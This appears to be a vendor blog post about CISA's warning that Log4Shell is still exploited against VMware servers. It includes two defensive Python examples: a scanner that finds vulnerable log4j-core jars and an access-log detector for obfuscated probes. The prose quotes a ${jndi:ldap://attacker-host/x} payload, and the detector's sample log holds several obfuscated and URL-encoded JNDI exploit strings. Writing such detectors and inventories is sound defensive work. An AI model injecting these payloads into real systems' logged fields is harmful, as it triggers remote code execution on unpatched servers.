Hackers Are Still Exploiting Log4Shell Vulnerability, Warns CISA
[Update]: CISA has updated its initial joint CSA with an additional Malware Analysis Report that provides further indicators of compromise.
Yesterday, CISA and United States Coast Guard Cyber Command (CGCYBER) warned that suspected nation-state (APT) hackers are still exploiting Log4Shell (CVE-2021-44228), specifically targeting unpatched, internet-facing VMware Horizon and Unified Access Gateway (UAG) servers. This has been occurring since December 2021, the same month Log4Shell was publicly disclosed, they said.
“As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2),” alerted CISA. “In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.”
The 1,872 other products affected by Log4Shell
This CISA alert underlines the additional care product security teams need to take to identify any software that bundles a vulnerable Log4j component: Log4j is almost always shipped inside other applications rather than installed on its own, so the exposure is rarely visible from a package list. However, security teams shouldn't stop at patching VMware Horizon and Unified Access Gateway servers: our records show that the Log4Shell vulnerability currently affects over 1,800 products.
In our 2021 Year End Vulnerability QuickView Report, we highlighted Log4Shell's potential for widespread impact, observing that it had more references than any other vulnerability, including Heartbleed, POODLE, and Spectre v2. Since that report was published, the total number of affected products has risen by 11.6 percent, according to our research, and it is likely to keep rising as we continue to track the vulnerability.
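Finding the bundled copies is the hard part of that inventory work. The scanner below is an added example written for this page (it is not Flashpoint's, CISA's or VMware's code): it opens application archives, reads the Maven `pom.properties` that the Log4j build embeds in every `log4j-core` jar, compares the version against the CVE-2021-44228 affected range (2.0-beta9 through 2.14.1, with the 2.12.2 and 2.3.1 backport lines excluded), and recurses into nested jars, .war and .ear files where a patched application may still carry an old copy. The sample jars it scans are constructed in memory so it runs offline; the `scan_tree` helper is what you would point at a real install directory.

```python
"""Added example (not Flashpoint's or CISA's code): locate copies of log4j-core
affected by CVE-2021-44228 inside application archives, including copies nested
in fat jars, .war and .ear files, by reading the Maven pom.properties that the
Log4j build embeds in every log4j-core jar."""
import io
import re
import zipfile
from pathlib import Path

# Paths a genuine log4j-core jar carries: Maven metadata and the lookup class at fault.
POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2}  # pre-release tags sort below a final release


def parse_version(v: str) -> tuple:
    """'2.14.1' -> (2, 14, 1, 3, 0); '2.0-beta9' -> (2, 0, 0, 1, 9). Tuples compare in release order."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([a-z]+)(\d*))?", v.strip().lower())
    if not m:
        raise ValueError(f"unparseable log4j version: {v!r}")
    major, minor, patch, pre, pre_n = m.groups()
    rank = PRE_RANK.get(pre, 3) if pre else 3
    return (int(major), int(minor), int(patch or 0), rank, int(pre_n or 0))


def is_affected(version: str) -> bool:
    """True if this log4j-core version is vulnerable to CVE-2021-44228.
    Affected: 2.0-beta9 up to 2.14.1. Fixed in 2.15.0, with backports 2.12.2 (Java 7)
    and 2.3.1 (Java 6). Log4j 1.x has no JNDI lookup and is out of scope here."""
    v = parse_version(version)
    if not (parse_version("2.0-beta9") <= v < parse_version("2.15.0")):
        return False
    for lo, hi in (("2.12.2", "2.13.0"), ("2.3.1", "2.4.0")):
        if parse_version(lo) <= v < parse_version(hi):
            return False
    return True


def scan_jar(data: bytes, name: str, findings: list, depth: int = 0) -> None:
    """Append (path, version, affected) for each log4j-core found in the archive bytes,
    descending into nested archives up to a fixed depth."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip container: nothing to inspect
    with zf:
        names = zf.namelist()
        if POM in names:
            props = zf.read(POM).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.M)
            version = m.group(1).strip() if m else "unknown"
            # No readable version: treat the presence of JndiLookup as affected until proven otherwise.
            affected = is_affected(version) if version != "unknown" else JNDI_CLASS in names
            findings.append((name, version, affected))
        elif JNDI_CLASS in names:
            # Shaded build without Maven metadata: flag it for manual review.
            findings.append((name, "unknown", True))
        if depth < 5:
            for entry in names:
                if entry.lower().endswith(ARCHIVE_SUFFIXES):
                    scan_jar(zf.read(entry), f"{name}!{entry}", findings, depth + 1)


def scan_tree(root: Path) -> list:
    """Scan every archive under a directory, e.g. a deployed application's install root."""
    findings = []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in ARCHIVE_SUFFIXES:
            scan_jar(p.read_bytes(), str(p), findings)
    return findings


def build_sample_jar(version: str, nested: bytes = b"") -> bytes:
    """Constructed fixture for this example: a minimal jar carrying only the log4j-core
    metadata, optionally bundling another jar the way a Spring Boot fat jar does."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM, f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        zf.writestr(JNDI_CLASS, b"")
        if nested:
            zf.writestr("BOOT-INF/lib/log4j-core.jar", nested)
    return buf.getvalue()


if __name__ == "__main__":
    # A patched application (2.17.1) that still bundles an old copy inside it.
    outer = build_sample_jar("2.17.1", nested=build_sample_jar("2.14.1"))
    results = []
    scan_jar(outer, "app.jar", results)
    for path, version, affected in results:
        print(f"{'AFFECTED' if affected else 'ok      '} {version:<10} {path}")
```

The constructed case is the one that bites in practice: the outer jar reports a fixed version, and only the nested `BOOT-INF/lib/log4j-core.jar` is flagged. A version check alone is not proof of safety for shaded or relocated builds, which is why a jar with `JndiLookup.class` but no readable version is reported as affected rather than silently skipped.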
Log4Shell, tracked as CVE-2021-44228 (CVSS score: 10.0), is a remote code execution vulnerability in the Apache Log4j 2 logging library, which is embedded in a wide range of consumer and enterprise services, websites, applications, and other products. Affected versions (2.0-beta9 through 2.14.1) evaluate lookup expressions found in the text they log, so an attacker who can get a string such as ${jndi:ldap://attacker-host/x} written to a log, through a User-Agent header or any other logged field, makes the server fetch and execute attacker-supplied code. Fixes shipped in Log4j 2.15.0, with 2.12.2 and 2.3.1 backports for the Java 7 and Java 6 lines.
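Because the trigger is a logged string, web-server access logs are the first place to look for exploitation attempts, but attackers rarely send the plain ${jndi:...} form: they nest other Log4j lookups (${lower:j}, ${::-j}, ${env:NOPE:-j}) and URL-encode the result so that a naive grep misses it. The detector below is an added example written for this page, not Flashpoint's or CISA's tooling and not Log4j's own code: it models the small subset of Log4j lookup evaluation those obfuscations rely on, collapses it, and then reports the JNDI target that remains. The access-log lines it runs over are constructed for the example (203.0.113.0/24 is a documentation address range).

```python
"""Added example (not Flashpoint's or CISA's code): spot Log4Shell probes in
access logs by undoing the lookup-nesting and URL-encoding attackers use to hide
the '${jndi:...}' payload. The lookup evaluation below is an approximation of the
vulnerable Log4j StrSubstitutor written for this example, not Log4j's own code."""
import re
from urllib.parse import unquote

# Innermost '${...}' expression, i.e. one containing no further '$', '{' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup with a remote target, after normalization.
JNDI_TARGET = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+://[^}\s]+)", re.I)
JNDI_ANY = re.compile(r"\$\{\s*jndi\s*:", re.I)


def resolve_inner(expr: str) -> str:
    """Evaluate one innermost lookup the way the vulnerable substitutor would."""
    head, _, rest = expr.partition(":")
    head = head.strip().lower()
    if head == "jndi":
        return "${" + expr + "}"          # the payload itself: keep it for the detector
    if head == "lower":
        return rest.lower()
    if head == "upper":
        return rest.upper()
    if ":-" in expr:
        # '${name:-default}': an unresolvable lookup such as '${::-j}' or
        # '${env:NOPE:-j}' falls back to its default text.
        return expr.split(":-", 1)[1]
    return "${" + expr + "}"              # anything else (date, sys, ...) is left alone


def normalize(s: str, max_passes: int = 50) -> str:
    """Repeatedly collapse innermost lookups until the string stops changing."""
    for _ in range(max_passes):
        new = INNER.sub(lambda m: resolve_inner(m.group(1)), s)
        if new == s:
            break
        s = new
    return s


def extract_jndi_targets(line: str) -> list:
    """Return the remote URLs a logged line would make Log4j connect to."""
    return JNDI_TARGET.findall(normalize(unquote(line)))


def is_log4shell_probe(line: str) -> bool:
    return bool(JNDI_ANY.search(normalize(unquote(line))))


def find_probes(lines) -> list:
    """(line number, decoded JNDI target) for every probe in an access log."""
    return [(n, t) for n, line in enumerate(lines, 1) for t in extract_jndi_targets(line)]


# Constructed sample access log for this example.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:15:01 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/b} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:03:15:30 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.7:1099/c}"',
    '10.0.0.9 - - [10/Dec/2021:03:16:12 +0000] "GET /?q=%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.7%3A1389%2Fd%7D HTTP/1.1" 400 0 "-" "-"',
    '10.0.0.12 - - [10/Dec/2021:03:17:00 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, target in find_probes(SAMPLE_LOG):
        print(f"line {n}: JNDI target {target}")
```

The decoded targets are the useful output: they are the callback hosts to block and to search for in outbound LDAP/RMI connection logs, which is how the lateral movement CISA describes becomes visible. A hit in the access log only proves an attempt; whether it succeeded depends on which Log4j version actually logged the request, which is the inventory question above.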
How to stay on top of vulnerabilities
To protect against Log4Shell exploitation attempts, and other potentially exploitable vulnerabilities, organizations need to know every affected vendor and product. A complete picture also requires knowledge of vulnerabilities that have not been assigned CVE IDs.
VulnDB has been tracking this information since Log4Shell's discovery and aggregating the details in its platform. The exact mechanism by which the VMware products were vulnerable, for example, was already explained in our description and solution information. With that metadata, VulnDB users can confirm that they are not exposed to the ongoing exploitation attempts.
Vulnerabilities and threat actor chatter
In addition to knowing your exposure to critical vulnerabilities and supply-chain/third-party weaknesses, it is vital to understand which vulnerabilities threat actors are actively discussing and seeking to exploit across illicit communities. That context tells security teams which remediation steps (patching, for example) to prioritize in order to close exposures like Log4Shell.
See Flashpoint’s vulnerability management solutions in action
There are likely many other products, aside from VMware Horizon and Unified Access Gateway, that are currently vulnerable to CVE-2021-44228. Sign up for a free VulnDB trial to see all the vendors and products currently affected by Log4Shell.